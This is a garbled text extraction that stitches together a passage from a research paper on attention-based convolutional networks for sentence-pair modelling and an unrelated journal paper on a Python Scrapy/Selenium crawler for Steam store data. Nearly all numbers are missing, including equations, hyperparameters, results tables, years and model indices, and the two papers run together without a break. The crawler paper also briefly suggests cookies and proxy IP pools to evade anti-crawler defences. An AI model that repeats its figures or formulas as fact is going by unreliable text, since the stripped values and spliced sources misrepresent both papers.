sentence (shown in red and blue). our motivation is that the atten- tion feature map will guide the convolution to learn “counterpart-biased” sentence representations. more formally, let fi,r ∈ rd×s be the represen- tation feature map of sentence i (i ∈ { , }). then we define the attention matrix a ∈ rs×s as follows: ai,j = match-score(f ,r[:, i], f ,r[:, j]) ( ) the function match-score can be defined in a variety of ways. we found that /( + |x − y|) works well where | · | is euclidean distance. given attention matrix a, we generate the atten- tion feature map fi,a for si as follows: f ,a = w ·a>, f ,a = w ·a the weight matrices w ∈ rd×s, w ∈ rd×s are parameters of the model to be learned in training. the weights of the two matrices are shared in our imple- mentation to reduce the number of parameters of the model. we stack the representation feature map fi,r and the attention feature map fi,a as an order tensor and feed it into convolution to generate a higher- level representation feature map for si (i ∈ { , }). in figure (a), s has units, s has . the output of convolution (shown in the top layer, filter width w = ) is a higher-level representation feature map with columns for s and columns for s . abcnn- . the abcnn- computes attention weights directly on the input representation with the aim of improving the features computed by convolu- tion. the abcnn- (figure (b)) instead computes attention weights on the output of convolution with the aim of reweighting this convolution output. in the example shown in figure (b), the feature maps output by convolution for s and s (layer marked “convolution” in figure (b)) have and columns, respectively; each column is the representation of a unit. the attention matrix a compares all units in s with all units of s . we sum all attention values for a unit to derive a single attention weight for that unit. this corresponds to summing all values in a row of a for s (“col-wise sum”, resulting in the column vector of size shown) and summing all values in a column for s (“row-wise sum”, resulting in the row vector of size shown). more formally, let a ∈ rs×s be the attention matrix, a ,j = ∑ a[j, :] the attention weight of unit j in s , a ,j = ∑ a[:, j] the attention weight of unit j in s and fci,r ∈ r d×(si+w− ) the output of convolution for si. then the j-th column of the new feature map fpi,r generated by w-ap is derived by: f p i,r[:, j]= ∑ k=j:j+w ai,kf c i,r[:, k], j = . . . si note that fpi,r ∈ r d×si , i.e., abcnn- pooling generates an output feature map of the same size as the input feature map of convolution. this allows us to stack multiple convolution-pooling blocks to extract features of increasing abstraction. there are three main differences between the abcnn- and the abcnn- . (i) attention in the abcnn- impacts convolution indirectly while at- tention in the abcnn- influences pooling through direct attention weighting. (ii) the abcnn- re- quires the two matrices wi to convert the attention matrix into attention feature maps; and the input to convolution has two times as many feature maps. thus, the abcnn- has more parameters than the abcnn- and is more vulnerable to overfitting. (iii) as pooling is performed after convolution, pool- ing handles larger-granularity units than convolu- tion; e.g., if the input to convolution has word level granularity, then the input to pooling has phrase level granularity, the phrase size being equal to filter size w. thus, the abcnn- and the abcnn- imple- ment attention mechanisms for linguistic units of different granularity. the complementarity of the abcnn- and the abcnn- motivates us to pro- pose the abcnn- , a third architecture that com- bines elements of the two. abcnn- (figure (c)) combines the abcnn- and the abcnn- by stacking them; it combines the strengths of the abcnn- and - by allowing the attention mechanism to operate (i) both on the con- volution and on the pooling parts of a convolution- pooling block and (ii) both on the input granularity and on the more abstract output granularity. experiments we test the proposed architectures on three tasks: answer selection (as), paraphrase identification (pi) and textual entailment (te). common training setup. words are initialized by -dimensional word vec embeddings and not changed during training. a single randomly initial- ized embedding is created for all unknown words by uniform sampling from [-. ,. ]. we employ ada- grad (duchi et al., ) and l regularization. network configuration. each network in the experiments below consists of (i) an initialization block b that initializes words by word vec em- beddings, (ii) a stack of k − convolution-pooling blocks b , . . . , bk, computing increasingly abstract features, and (iii) one final lr layer (logistic regres- sion layer) as shown in figure . the input to the lr layer consists of kn features – each block provides n similarity scores, e.g., n cosine similarity scores. figure shows the two sentence vectors output by the final block bk of the stack (“sentence representation ”, “sentence repre- sentation ”); this is the basis of the last n similarity scores. as we explained in the final paragraph of section , we perform all-ap pooling for all blocks, as pi te #c l lr w l lr w l lr w l abcnn- . . . . . . abcnn- . . . . . . abcnn- . . . . . . abcnn- . . . . . . abcnn- . . . . . . abcnn- . . . . . . table : hyperparameters. lr: learning rate. #cl: num- ber convolution layers. w: filter width. the number of convolution kernels di (i > ) is throughout. not just for bk. thus we get one sentence representa- tion each for s and s for each block b , . . . , bk. we compute n similarity scores for each block (based on the block’s two sentence representations). thus, we compute a total of kn similarity scores and these scores are input to the lr layer. depending on the task, we use different methods for computing the similarity score: see below. layerwise training. in our training regime, we first train a network consisting of just one convolution-pooling block b . we then create a new network by adding a block b , initialize its b block with the previously learned weights for b and train b keeping the previously learned weights for b fixed. we repeat this procedure until all k − convolution-pooling blocks are trained. we found that this training regime gives us good performance and shortens training times considerably. since sim- ilarity scores of lower blocks are kept unchanged once they have been learned, this also has the nice effect that “simple” similarity scores (those based on surface features) are learned first and subsequent training phases can focus on complementary scores derived from more complex abstract features. classifier. we found that performance increases if we do not use the output of the lr layer as the final decision, but instead train a linear svm or a logistic regression with default parameters directly on the input to the lr layer (i.e., on the kn similarity scores that are generated by the k-block stack after network training is completed). direct training of svms/lr seems to get closer to the global optimum than gradient descent training of cnns. table shows hyperparameters, tuned on dev. we use addition and lstms as two shared base- lines for all three tasks, i.e., for as, pi and te. we http://scikit-learn.org/stable/ for both. http://scikit-learn.org/stable/ now describe these two shared baselines. (i) addition. we sum up word embeddings element-wise to form each sentence representation. the classifier input is then the concatenation of the two sentence representations. (ii) a-lstm. be- fore this work, most attention mechanisms in nlp were implemented in recurrent neural networks for text generation tasks such as machine translation (e.g., bahdanau et al. ( ), luong et al. ( )). rocktäschel et al. ( ) present an attention-lstm for natural language inference. since this model is the pioneering attention based rnn system for sen- tence pair classification, we consider it as a baseline system (“a-lstm”) for all our three tasks. the a- lstm has the same configuration as our abcnns in terms of word initialization ( -dimensional word vec embeddings) and the dimensionality of all hidden layers ( ). . answer selection we use wikiqa, an open domain question-answer dataset. we use the subtask that assumes that there is at least one correct answer for a question. the corresponding dataset consists of , question- candidate pairs in train, , pairs in dev and , pairs in test where we adopt the standard setup of only considering questions with correct answers in test. following yang et al. ( ), we truncate an- swers to tokens. the task is to rank the candidate answers based on their relatedness to the question. evaluation mea- sures are mean average precision (map) and mean reciprocal rank (mrr). task-specific setup. we use cosine similarity as the similarity score for as. in addition, we use sen- tence lengths, wordcnt (count of the number of non- stopwords in the question that also occur in the an- swer) and wgtwordcnt (reweight the counts by the idf values of the question words). thus, the final input to the lr layer has size k + : one cosine for each of the k blocks and the four additional features. we compare with seven baselines. the first three are considered by yang et al. ( ): (i) wordcnt; (ii) wgtwordcnt; (iii) cnn-cnt (the state-of-the- art system): combine cnn with (i) and (ii). apart from the baselines considered by yang et al. ( ), http://aka.ms/wikiqa (yang et al., ) method map mrr b as el in es wordcnt . . wgtwordcnt . . cnn-cnt . . addition . . addition(+) . . a-lstm . . a-lstm(+) . . bcnn one-conv . . two-conv . . abcnn- one-conv . ∗ . ∗ two-conv . ∗ . ∗ abcnn- one-conv . ∗ . ∗ two-conv . ∗ . ∗ abcnn- one-conv . ∗ . ∗ two-conv . ∗ . ∗ table : results on wikiqa. best result per column is bold. significant improvements over state-of-the-art baselines (underlined) are marked with ∗ (t-test, p < . ). we compare with two addition baselines and two lstm baselines. addition and a-lstm are the shared baselines described before. we also combine both with the four extra features; this gives us two additional baselines that we refer to as addition(+) and a-lstm(+). results. table shows performance of the base- lines, of the bcnn and of the three abcnns. for cnns, we test one (one-conv) and two (two-conv) convolution-pooling blocks. the non-attention network bcnn already per- forms better than the baselines. if we add attention mechanisms, then the performance further improves by several points. comparing the abcnn- with the abcnn- , we find the abcnn- is slightly better even though the abcnn- is the simpler ar- chitecture. if we combine the abcnn- and the abcnn- to form the abcnn- , we get further improvement. this can be explained by the abcnn- ’s abil- ity to take attention of finer-grained granularity into consideration in each convolution-pooling block while the abcnn- and the abcnn- consider at- tention only at convolution input or only at pooling input, respectively. we also find that stacking two convolution-pooling blocks does not bring consis- tent improvement and therefore do not test deeper architectures. if we limit the input to the lr layer to the k similarity scores in the abcnn- (two-conv), results are . (map) / . (mrr). http://aka.ms/wikiqa . paraphrase identification we use the microsoft research paraphrase (msrp) corpus (dolan et al., ). the training set contains true / false and the test set true / false paraphrase pairs. we randomly select pairs from train and use them as dev; but we still report results for training on the entire training set. for each triple (label, s , s ) in the training set, we also add (label, s , s ) to the training set to make best use of the training data. systems are evaluated by accuracy and f . task-specific setup. in this task, we add the mt features from (madnani et al., ) and the lengths of the two sentences. in addition, we compute rouge- , rouge- and rouge-su (lin, ), which are scores measuring the match between the two sentences on (i) unigrams, (ii) bi- grams and (iii) unigrams and skip-bigrams (maxi- mum skip distance of four), respectively. in this task, we found transforming euclidean distance into similarity score by /( + |x − y|) performs better than cosine similarity. additionally, we use dynamic pooling (yin and schütze, a) of the attention matrix a in equation ( ) and forward pooled val- ues of all blocks to the classifier. this gives us bet- ter performance than only forwarding sentence-level matching features. we compare our system with representative dl approaches: (i) a-lstm; (ii) a-lstm(+): a- lstm plus handcrafted features; (iii) rae (socher et al., ), recursive autoencoder; (iv) bi-cnn- mi (yin and schütze, a), a bi-cnn architec- ture; and (v) mpssm-cnn (he et al., ), the state-of-the-art nn system for pi, and the follow- ing four non-dl systems: (vi) addition; (vii) ad- dition(+): addition plus handcrafted features; (viii) mt (madnani et al., ), a system that combines machine translation metrics; (ix) mf-tf-kld (ji and eisenstein, ), the state-of-the-art non-nn system. results. table shows that the bcnn is slightly worse than the state-of-the-art whereas the abcnn- roughly matches it. the abcnn- is slightly above the state-of-the-art. the abcnn- outper- for better comparability of approaches in our experiments, we use a simple svm classifier, which performs slightly worse than madnani et al. ( )’s more complex meta-classifier. method acc f b as el in es majority voting . . rae . . bi-cnn-mi . . mpssm-cnn . . mt . . mf-tf-kld . . addition . . addition (+) . . a-lstm . . a-lstm (+) . . bcnn one-conv . . two-conv . . abcnn- one-conv . . two-conv . . abcnn- one-conv . . two-conv . . abcnn- one-conv . . two-conv . . table : results for pi on msrp forms the state-of-the-art in accuracy and f . two convolution layers only bring small improvements over one. . textual entailment semeval task (marelli et al., a) eval- uates system predictions of textual entailment (te) relations on sentence pairs from the sick dataset (marelli et al., b). the three classes are entail- ment, contradiction and neutral. the sizes of sick train, dev and test sets are , and pairs, respectively. we call this dataset orig. we also create nonover, a copy of orig in which words occurring in both sentences are re- moved. a sentence in nonover is denoted by the special token <empty> if all words are removed. table shows three pairs from orig and their trans- formation in nonover. we observe that focusing on the non-overlapping parts provides clearer hints for te than orig. in this task, we run two copies of each network, one for orig, one for nonover; these two networks have a single common lr layer. like lai and hockenmaier ( ), we train our final system (after fixing hyperparameters) on train and dev ( pairs). eval measure is accuracy. task-specific setup. we found that for this task forwarding two similarity scores from each block improvement of . (acc) and . (f ) over state-of-the-art is not significant. the abcnn- (two-conv) without “linguistic” features (i.e., mt and rouge) achieves . / . . orig nonover children in red shirts are children red shirts playing in the leaves playing three kids are sitting in the leaves three kids sitting three boys are jumping in the leaves boys three kids are jumping in the leaves kids a man is jumping into an empty pool an empty a man is jumping into a full pool a full table : sick data: converting the original sentences (orig) into the nonover format (instead of just one) is helpful. we use cosine sim- ilarity and euclidean distance. as we did for para- phrase identification, we add the mt features for each sentence pair for this task as well; our motiva- tion is that entailed sentences resemble paraphrases more than contradictory sentences do. we use the following linguistic features. nega- tion is important for detecting contradiction. fea- ture neg is set to if either sentence contains “no”, “not”, “nobody”, “isn’t” and to otherwise. fol- lowing lai and hockenmaier ( ), we use word- net (miller, ) to detect nyms: synonyms, hy- pernyms and antonyms in the pairs. but we do this on nonover (not on orig) to focus on what is critical for te. specifically, feature syn is the number of word pairs in s and s that are syn- onyms. hyp (resp. hyp ) is the number of words in s (resp. s ) that have a hypernym in s (resp. s ). in addition, we collect all potential antonym pairs (pap) in nonover. we identify the matched chunks that occur in contradictory and neutral, but not in entailed pairs. we exclude synonyms and hy- pernyms and apply a frequency filter of n = . in contrast to lai and hockenmaier ( ), we con- strain the pap pairs to cosine similarity above . in word vec embedding space as this discards many noise pairs. feature ant is the number of matched pap antonyms in a sentence pair. as before we use sentence lengths, both for orig (len o: length s , len o: length s ) and for nonover (len n: length s , len n: length s ). on the whole, we have extra features: mt metrics, neg, syn, hyp , hyp , ant, len o, len o, len n and len n. apart from the addition and lstm baselines, we further compare with the top- systems in semeval and trrntn (bowman et al., b), a recursive neural network developed for this sick task. method acc s em - e va l to p (jimenez et al., ) . (zhao et al., ) . (lai and hockenmaier, ) . trrntn (bowman et al., b) . addition no features . plus features . a-lstm no features . plus features . bcnn one-conv . two-conv . abcnn- one-conv . two-conv . abcnn- one-conv . two-conv . abcnn- one-conv . ∗ two-conv . ∗ table : results on sick. significant improvements over (lai and hockenmaier, ) are marked with ∗ (test of equal proportions, p < . ). results. table shows that our cnns outper- form a-lstm (with or without linguistic features added) and the top three semeval systems. compar- ing abcnns with the bcnn, attention mechanisms consistently improve performance. the abcnn- has performance comparable to the abcnn- while the abcnn- is better still: a boost of . points compared to the previous state of the art. visual analysis. figure visualizes the attention matrices for one te sentence pair in the abcnn- for blocks b (unigrams), b (first convolutional layer) and b (second convolutional layer). darker shades of blue indicate stronger attention values. in figure (top), each word corresponds to ex- actly one row or column. we can see that words in si with semantic equivalents in s −i get high atten- tion while words without semantic equivalents get low attention, e.g., “walking” and “murals” in s and “front” and “colorful” in s . this behavior seems reasonable for the unigram level. rows/columns of the attention matrix in figure (middle) correspond to phrases of length three since filter width w = . high attention values generally correlate with close semantic correspondence: the phrase “people are” in s matches “several people are” in s ; both “are walking outside” and “walking outside the” in s match “are in front” in s ; “the building that” in s matches “a colorful building” in if we run the abcnn- (two-conv) without the linguis- tic features, performance is . . several people are in front of a colorful building people are walking outside the building that has several murals on it se ve ra l se ve ra l p eo pl e se ve ra l p eo pl e ar e p eo pl e ar e in ar e in fr on t in fr on t o f fr on t o f a of a c ol or fu l a co rlo rf ul b ui ld in g co rlo rf ul b ui ld in g bu ild in g people people are people are walking are walking outside walking outside the outside the building the building that building that has that has several has several murals several murals on murals on it on it it se ve ra l se ve ra l p eo pl e se ve ra l.. .a re se ve ra l.. .in se ve ra l.. .fr on t pe op le ... of ar e. ..a in ... co lo rf ul fr on t.. .b ui ld in g of ... bu ild in g a. ..b ui ld in g people people are people...walking people...outside people...the are...building walking...that outside...has the...several building...murals that...on has...it several...it murals...it figure : attention visualization for te. top: unigrams, b . middle: conv , b . bottom: conv , b . s . more interestingly, looking at the bottom right corner, both “on it” and “it” in s match “building” in s ; this indicates that abcnns are able to detect some coreference across sentences. “building” in s has two places in which higher attentions appear, one is with “it” in s , the other is with “the building that” in s . this may indicate that abcnns recog- nize that “building” in s and “the building that” / “it” in s refer to the same object. hence, corefer- ence resolution across sentences as well as within a sentence both are detected. for the attention vectors on the left and the top, we can see that attention has focused on the key parts: “people are walking out- side the building that” in s , “several people are in” and “of a colorful building” in s . rows/columns of the attention matrix in figure (bottom, second layer of convolution) correspond to phrases of length since filter width w = in both convolution layers ( = + ∗ ( − )). we use “. . .” to denote words in the middle if a phrase like “several...front” has more than two words. we can see that attention distribution in the matrix has focused on some local regions. as granularity of phrases is larger, it makes sense that the attention values are smoother. but we still can find some interesting clues: at the two ends of the main di- agonal, higher attentions hint that the first part of s matches well with the first part of s ; “several murals on it” in s matches well with “of a color- ful building” in s , which satisfies the intuition that these two phrases are crucial for making a decision on te in this case. this again shows the potential strength of our system in figuring out which parts of the two sentences refer to the same object. in ad- dition, in the central part of the matrix, we can see that the long phrase “people are walking outside the building” in s matches well with the long phrase “are in front of a colorful building” in s . summary we presented three mechanisms to integrate atten- tion into cnns for general sentence pair modeling tasks. our experiments on as, pi and te show that attention-based cnns perform better than cnns without attention mechanisms. the abcnn- gen- erally outperforms the abcnn- and the abcnn- surpasses both. in all tasks, we did not find any big improvement of two layers of convolution over one layer. this is probably due to the limited size of training data. we expect that, as larger training sets become available, deep abcnns will show even better performance. in addition, linguistic features contribute in all three tasks: improvements by . (map) and . (mrr) for as, improvements by . (acc) and . (f ) for pi and an improvement by . (acc) for te. but our abcnns can still reach or surpass state-of-the-art even without those features in as and te tasks. this indicates that abcnns are gen- erally strong nn systems. attention-based lstms are especially successful in tasks with a strong generation component like ma- chine translation (discussed in sec. ). cnns have not been used for this type of task. this is an inter- esting area of future work for attention-based cnns. acknowledgments we gratefully acknowledge the support of deutsche forschungsgemeinschaft (dfg): grant schu / - . we would like to thank the anonymous reviewers for their helpful comments. references jimmy ba, volodymyr mnih, and koray kavukcuoglu. . multiple object recognition with visual atten- tion. in proceedings of iclr. dzmitry bahdanau, kyunghyun cho, and yoshua ben- gio. . neural machine translation by jointly learning to align and translate. in proceedings of iclr. matthew w. bilotti, paul ogilvie, jamie callan, and eric nyberg. . structured retrieval for question an- swering. in proceedings of sigir, pages – . william blacoe and mirella lapata. . a comparison of vector-based representations for semantic composi- tion. in proceedings of emnlp-conll, pages – . samuel r. bowman, gabor angeli, christopher potts, and christopher d. manning. a. a large anno- tated corpus for learning natural language inference. in proceedings of emnlp, pages – . samuel r. bowman, christopher potts, and christo- pher d. manning. b. recursive neural networks can learn logical semantics. in proceedings of cvsc workshop, pages – . jane bromley, james w. bentz, léon bottou, isabelle guyon, yann lecun, cliff moore, eduard säckinger, and roopak shah. . signature verification us- ing a “siamese” time delay neural network. ijprai, ( ): – . chunshui cao, xianming liu, yi yang, yinan yu, jiang wang, zilei wang, yongzhen huang, liang wang, chang huang, wei xu, deva ramanan, and thomas s. huang. . look and think twice: cap- turing top-down visual attention with feedback con- volutional neural networks. in proceedings of iccv, pages – . ming-wei chang, dan goldwasser, dan roth, and vivek srikumar. . discriminative learning over con- strained latent representations. in proceedings of naacl-hlt, pages – . kan chen, jiang wang, liang-chieh chen, haoyuan gao, wei xu, and ram nevatia. . abc-cnn: an attention based convolutional neural network for visual question answering. corr, abs/ . . jan chorowski, dzmitry bahdanau, kyunghyun cho, and yoshua bengio. . end-to-end continuous speech recognition using attention-based recurrent nn: first results. in proceedings of deep learning and repre- sentation learning workshop, nips. jan chorowski, dzmitry bahdanau, dmitriy serdyuk, kyunghyun cho, and yoshua bengio. . attention-based models for speech recognition. in proceedings of nips, pages – . bill dolan, chris quirk, and chris brockett. . un- supervised construction of large paraphrase corpora: exploiting massively parallel news sources. in pro- ceedings of coling, pages – . john duchi, elad hazan, and yoram singer. . adaptive subgradient methods for online learning and stochastic optimization. jmlr, : – . minwei feng, bing xiang, michael r. glass, lidan wang, and bowen zhou. . applying deep learn- ing to answer selection: a study and an open task. in proceedings of ieee asru workshop, pages – . karol gregor, ivo danihelka, alex graves, danilo jimenez rezende, and daan wierstra. . draw: a recurrent neural network for image generation. in proceedings of icml, pages – . hua he, kevin gimpel, and jimmy j. lin. . multi- perspective sentence similarity modeling with convo- lutional neural networks. in proceedings of emnlp, pages – . michael heilman and noah a. smith. . tree edit models for recognizing textual entailments, para- phrases, and answers to questions. in proceedings of naacl-hlt, pages – . sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – . seunghoon hong, junhyuk oh, honglak lee, and bo- hyung han. . learning transferrable knowl- edge for semantic segmentation with deep convolu- tional neural network. in proceedings of cvpr. baotian hu, zhengdong lu, hang li, and qingcai chen. . convolutional neural network architectures for matching natural language sentences. in proceedings of nips, pages – . yangfeng ji and jacob eisenstein. . discriminative improvements to distributional sentence similarity. in proceedings of emnlp, pages – . sergio jimenez, george dueñas, julia baquero, and alexander gelbukh. . unal-nlp: combining soft cardinality features for semantic textual similar- ity, relatedness and entailment. in proceedings of se- meval, pages – . nal kalchbrenner, edward grefenstette, and phil blun- som. . a convolutional neural network for mod- elling sentences. in proceedings of acl, pages – . yoon kim. . convolutional neural networks for sen- tence classification. in proceedings of emnlp, pages – . alice lai and julia hockenmaier. . illinois-lh: a denotational and distributional approach to semantics. in proceedings of semeval, pages – . yann lecun, léon bottou, yoshua bengio, and patrick haffner. . gradient-based learning applied to document recognition. in proceedings of the ieee, pages – . jiwei li, minh-thang luong, and dan jurafsky. . a hierarchical neural autoencoder for paragraphs and documents. in proceedings of acl, pages – . chin-yew lin. . rouge: a package for automatic evaluation of summaries. in proceedings of the acl text summarization workshop. thang luong, hieu pham, and christopher d. manning. . effective approaches to attention-based neural machine translation. in proceedings of emnlp, pages – . nitin madnani, joel tetreault, and martin chodorow. . re-examining machine translation metrics for paraphrase identification. in proceedings of naacl- hlt, pages – . marco marelli, luisa bentivogli, marco baroni, raf- faella bernardi, stefano menini, and roberto zampar- elli. a. semeval- task : evaluation of com- positional distributional semantic models on full sen- tences through semantic relatedness and textual entail- ment. in proceedings of semeval, pages – . marco marelli, stefano menini, marco baroni, luisa bentivogli, raffaella bernardi, and roberto zampar- elli. b. a sick cure for the evaluation of com- positional distributional semantic models. in proceed- ings of lrec, pages – . tomas mikolov, ilya sutskever, kai chen, gregory s. corrado, and jeffrey dean. . distributed rep- resentations of words and phrases and their composi- tionality. in proceedings of nips, pages – . george a. miller. . wordnet: a lexical database for english. commun. acm, ( ): – . volodymyr mnih, nicolas heess, alex graves, and ko- ray kavukcuoglu. . recurrent models of visual attention. in proceedings of nips, pages – . dan moldovan, christine clark, sanda harabagiu, and daniel hodges. . cogex: a semantically and contextually enriched logic prover for question an- swering. journal of applied logic, ( ): – . vasin punyakanok, dan roth, and wen-tau yih. . mapping dependencies trees: an application to ques- tion answering. in proceedings of ai&math (special session: intelligent text processing). tim rocktäschel, edward grefenstette, karl moritz her- mann, tomáš kočiskỳ, and phil blunsom. . rea- soning about entailment with neural attention. in pro- ceedings of iclr. alexander m. rush, sumit chopra, and jason weston. . a neural attention model for abstractive sen- tence summarization. in proceedings of emnlp, pages – . dan shen and mirella lapata. . using semantic roles to improve question answering. in proceedings of emnlp-conll, pages – . richard socher, eric h. huang, jeffrey pennington, an- drew y. ng, and christopher d. manning. . dy- namic pooling and unfolding recursive autoencoders for paraphrase detection. in proceedings of nips, pages – . ming tan, bing xiang, and bowen zhou. . lstm- based deep learning models for non-factoid answer se- lection. in proceedings of iclr workshop. shengxian wan, yanyan lan, jiafeng guo, jun xu, liang pang, and xueqi cheng. . a deep architecture for semantic matching with multiple positional sentence representations. in proceedings of aaai, pages – . mengqiu wang, noah a. smith, and teruko mitamura. . what is the jeopardy model? a quasi- synchronous grammar for qa. in proceedings of emnlp-conll, pages – . tianjun xiao, yichong xu, kuiyuan yang, jiaxing zhang, yuxin peng, and zheng zhang. . the application of two-level attention models in deep con- volutional neural network for fine-grained image clas- sification. in proceedings of cvpr, pages – . kelvin xu, jimmy ba, ryan kiros, kyunghyun cho, aaron c. courville, ruslan salakhutdinov, richard s. zemel, and yoshua bengio. . show, attend and tell: neural image caption generation with visual at- tention. in proceedings of icml, pages – . yi yang, wen-tau yih, and christopher meek. . wikiqa: a challenge dataset for open-domain ques- tion answering. in proceedings of emnlp, pages – . xuchen yao, benjamin van durme, chris callison- burch, and peter clark. a. semi-markov phrase- based monolingual alignment. in proceedings of emnlp, pages – . xuchen yao, benjamin van durme, and peter clark. b. automatic coupling of answer extraction and information retrieval. in proceedings of acl, pages – . wen-tau yih, ming-wei chang, christopher meek, and andrzej pastusiak. . question answering using enhanced lexical semantic models. in proceedings of acl, pages – . wenpeng yin and hinrich schütze. a. convolu- tional neural network for paraphrase identification. in proceedings of naacl-hlt, pages – . wenpeng yin and hinrich schütze. b. multi- grancnn: an architecture for general matching of text chunks on multiple levels of granularity. in pro- ceedings of acl-ijcnlp, pages – . lei yu, karl moritz hermann, phil blunsom, and stephen pulman. . deep learning for answer sen- tence selection. in proceedings of deep learning and representation learning workshop, nips. jiang zhao, tiantian zhu, and man lan. . ecnu: one stone two birds: ensemble of heterogenous mea- sures for semantic relatedness and textual entailment. in proceedings of semeval, pages – . introduction related work bcnn: basic bi-cnn abcnn: attention-based bcnn experiments answer selection paraphrase identification textual entailment summary international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - application research of crawler and data analysis based on python wu hejing east university of heilongjiang heilongjiang, e-mail: @qq.com, liu fang east university of heilongjiang heilongjiang, ) zhao long east university of heilongjiang heilongjiang, shao yabin east university of heilongjiang heilongjiang, cui ran east university of heilongjiang heilongjiang, abstract—combined with the actual situation, this paper explores how to develop a crawler method based on the specific framework for the complete interface of steam manufacturers and stores, which should be able to automatically and efficiently crawl the data of specific targets, analyze the dynamic pages, and complete the data cleaning, downloading, saving and other operations, explore the methods of general data analysis, and analyze the downloaded data, extract useful information from it, analyze and summarize the specific crawler method and data analysis method through practical application. keywords-python; scrapy; selenium; beautifulsoup i. introduction the st century is a book written by information. with the rapid development of information technology, today's society has become a huge information polymer, and there are various kinds of data in this huge polymer. data is a kind of embodiment of information. in this era of information explosion, how to efficiently find the data we want from all kinds of miscellaneous data and extract them from the network in batches has become a key problem. however, sometimes the unprocessed data itself may be confusing for people. how to process the huge and complex data obtained through what kind of technical means, and finally become an intuitive number, or trend, and become the information that people can obtain intuitively is also a very important topic to be studied in this data age. ii. statistical investigation on the preference sales volume in this project, the american steam online game platform mall is selected as the research object of the crawler. by setting a specific game company as a search keyword in steam's online mall, the data of all works of the company in steam mall are crawled, and the useful information is extracted by analyzing the basic data of each manufacturer's preference for game production type, series sales volume, and praise in addition, the game manufacturers are comprehensively scored and evaluated. international journal of advanced network, monitoring and controls volume , no. , iii. relevant technology and framework this project will use the scrapy framework based on python language to crawl steam website. python as a language has the advantages of lightweight, simplicity, wide range of application and so on. at present, various crawler frameworks and application libraries based on python have been very mature, among which the crawler framework is very popular in the application of general web crawlers. its first version was released in , and now it is quite mature as a crawler framework. the basicprinciple of the scrapy framework is shown in figure . figure . basic principles of scrapy frame iv. design of crawler a. general design idea the process of crawler itself is actually to simulate the user's operation on the browser with a program. first of all, the starting point and range of crawling need to be specified. as the target of crawling is for manufacturers and their works, the interface of manufacturers is taken as the starting point. for example, the page of paradox, a manufacturer, first analyzes the entire manufacturer's page, and finds that the page links and information of all games or game related dlc downloads of the manufacturer are stored in the recommendation div framework of each sub recommendation of recommendations rows, as shown in figure b. design and implementation of reptile functions the crawler architecture is composed of items, spiders, piplings and middleware. among them, items are mainly used to define the items to be crawled, spiders are responsible for defining the whole process of crawling, what means to crawl, pipes are responsible for the basic operations such as data cleaning and saving, middleware can be responsible for the bridge service of scratch and other plug-ins or architectures. responses requests scheduler spiders item pipeline downloader internet scrapyengine spider middlewares downloader middlewares item international journal of advanced network, monitoring and controls volume , no. , figure . investigation of html page structure of steam manufacturers by using viewers first, the items to be crawled are defined in the items file. finally, these items may be submitted to the analysis part for data analysis. the specific design and implementation code is: import scrapy class steamdevitem(scrapy.item): # define the fields for your item here like: # name = scrapy.field() qry_nam = scrapy.field() if_dev = scrapy.field() pub_sum = scrapy.field() pub_gam_sum = scrapy.field() pub_dlc_sum = scrapy.field() dev_nam = scrapy.field() pub_nam = scrapy.field() gam_title = scrapy.field() res_date = scrapy.field() gam_type = scrapy.field() gam_tag = scrapy.field() if_muti = scrapy.field() gam_score = scrapy.field() gam_score_sum = scrapy.field() gam_score_ratio = scrapy.field() pass c. spider design the design of spider is the key point of this project. whether the initial dynamic page connection or the last static page information crawling mode will be defined international journal of advanced network, monitoring and controls volume , no. , in this file. in this project, spider will be named steam, and some key implementation codes will be pasted here, with running results and some notes attached. first, introduce start_ the design method of dynamic page crawling of selenium in requests method: chrome_opt = webdriver.chromeoptions() prefs = { "profile.managed_default_content_settings.images": , 'permissions.default.stylesheet': } chrome_opt.add_experimental_option("prefs", prefs) browser = webdriver.chrome(options=chrome_opt) browser.get("https://store.steampowered.com/" + qry_sta + "/" + qry_target) bs = beautifulsoup(browser.page_source, 'html.parser') #beautiful soup the specific store connections of each product exist in the a anchor label of each entry, and these connections are read to the defined links using the loop_ in the list list, crawling of the list is completed, but sometimes the text and picture in the entry may contain a tag, and they all point to the same page. if direct application may cause repeated crawling, a loop is used here, and if not in statement is used to de duplicate the list. after using the print statement to verify the function of the module, the verification results are shown in figure . figure . list of urls obtained by selenium and beautiful soup international journal of advanced network, monitoring and controls volume , no. , d. start directional climbing after designing and debugging the spider, run the cmd command window of the system, open the root directory of the crawler file, and input the crawler stream-o steamdev.csv , crawl the target website. input - o steamdev.csv the purpose is to let the crawler save the last crawled data in the form of csv table. the saved data appears in the project root. see figure for the climbing process. figure . executing the start request method selenium pop-up browser to crawl the dynamic page v. data analysis next, we will perform basic visual operations on the crawled data in the form of operation tables. in the crawler project, we crawled for the paradox interactive publisher. the crawled data is presented in the form of csv tables, as shown in figure . through the use of spreadsheets and further collation of the crawled data, the following data are obtained: the publisher has published works in steam platform, of which the majority of dlc has published dlc, most of the games published are single player games, and each game published in its mall has an average of reviews, of which the proportion of favorable reviews is about . %, see the chart below for detailed visual analysis. international journal of advanced network, monitoring and controls volume , no. , figure . crawled data list figure . output the publisher platform follower ranking chart international journal of advanced network, monitoring and controls volume , no. , vi. conclusion through demonstration and part of practice, this paper explores the process of data crawling and basic data analysis of dynamic pages by combining the general python's story framework with selenium + beautiful soup through crawling the steam online game mall website. the crawler has good scalability. for example, if you want to compare the crawling data of multiple game manufacturers, you can write a query manufacturer list to get the product url list from the dynamic web page of the manufacturer list first. in terms of anti-crawler, selenium itself has a very good anti crawler ability. if you want to further anti crawler, you can also expand multiple cookies, and even establish a proxy ip pool. acknowledgment this paper is about the scientific research project of heilongjiang oriental university in , "implementation of crawler based on python scrapy framework", project number hdfky reference [ ] yuhao fan. design and implementation of distributed crawler system based on scrapy[j].iop conference series: earth and environmental science, , ( ): - . [ ] jing wang, yuchun guo. scrapy-based crawling and user-behavior characteristics analysis on taobao[p]. cyber-enabled distributed computing and knowledge discovery (cyberc), international conference on, : - . [ ] ryan mitchell. python web crawler authority guide (second edition) [m]. beijing: people's post and telecommunications press, : - . [ ] wei chengcheng. data information crawler technology based on python [j]. electronic world, ( ): - . [ ] mark.lutz . python learning manual (fifth edition, volume i) [m]. beijing: mechanical industry press, : - . [ ] fan chuanhui. python reptile development and project practice [m]. beijing: mechanical industry press, ( ): - . [ ] song yongsheng, huang rongmei, wang jun. research on python based data analysis and visualization platform [j]. modern information technology: ( ): - . [ ] liu yuke, wang ping. statistics and 